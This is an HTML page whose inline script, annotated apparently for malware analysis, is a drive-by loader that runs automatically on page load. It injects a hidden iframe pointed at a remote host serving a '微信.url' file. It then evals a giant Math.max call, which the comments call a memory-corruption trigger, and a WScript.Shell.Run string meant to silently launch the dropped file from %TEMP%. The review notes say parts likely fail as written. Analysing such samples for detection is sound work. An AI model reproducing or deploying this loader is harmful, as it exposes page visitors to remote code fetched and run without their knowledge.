11.html
<html>
<head>
<meta charset="utf-8">
<title>Code Demo</title>
</head>
<body>
<script>
// This is the code you gave me
/**
 * Hidden-iframe loader, annotated for analysis.
 *
 * Adds an invisible iframe to the page, points it at a hard-coded remote
 * `.url` file, and in the iframe's load handler passes two very large
 * generated strings to the frame's `eval`.
 *
 * Triage signals visible in this block: an iframe hidden with
 * `display: none`, `eval` on strings built with `repeat(0x100000)`, a
 * reference to `WScript.Shell.Run`, and a `.url` file path under `%TEMP%`.
 *
 * NOTE(review): the original comments call this "memory corruption", but
 * nothing on the page names an affected engine, version or bug; treat that
 * description as the author's claim, not an established fact.
 *
 * Takes no parameters and returns nothing.
 */
function evil() {
// Build the iframe and hide it so nothing is rendered to the user.
var iframe = document.createElement("iframe");
iframe.style.display = "none";
document.body.appendChild(iframe);
// Point the frame at the hard-coded remote resource. The percent-encoded
// file name decodes to the same "微信.url" name used in the load handler below.
// A frame-src restriction in the hosting page's Content-Security-Policy would
// stop this navigation.
iframe.src = "https://v.zzsp.eu.org/%E5%BE%AE%E4%BF%A1.url";
// Everything below runs only after the frame fires its load event.
iframe.onload = function() {
// Handle to the frame's window.
// NOTE(review): if the embedding page is on a different origin from the frame
// URL, the same-origin policy is expected to reject the eval calls below - confirm
// against where this file was actually served from.
var win = iframe.contentWindow;
// Evaluates a generated `Math.max(...)` call with 0x100000 (1,048,576) repeated
// "0," arguments plus a final 0. The source labels this the corruption trigger;
// see the NOTE(review) in the header.
win.eval("Math.max(" + "0,".repeat(0x100000) + "0)");
// Builds a `WScript.Shell.Run(...)` string around a path to 微信.url in the TEMP
// directory, padded with 0x100000 quote characters on each side; the trailing
// `, 0` is what the original comment calls the "silent" argument.
// NOTE(review): `process` and `WScript` are not browser globals, so this line is
// not expected to execute in a page context as written; read it as an indicator of
// intent (run a dropped shortcut file) when writing detections.
win.eval("WScript.Shell.Run(" + "'".repeat(0x100000) + `${process.env.TEMP}\\微信.url /S` + "'".repeat(0x100000) + ", 0)");
};
}
// Runs evil() as soon as this inline script is executed: the call sits at the top
// level of the <script> element, so no click or other user gesture is involved.
// For detection, the pairing of an auto-invoked function with a hidden iframe is
// the pattern to flag, independent of the specific URL.
evil();
</script>
</body>
</html>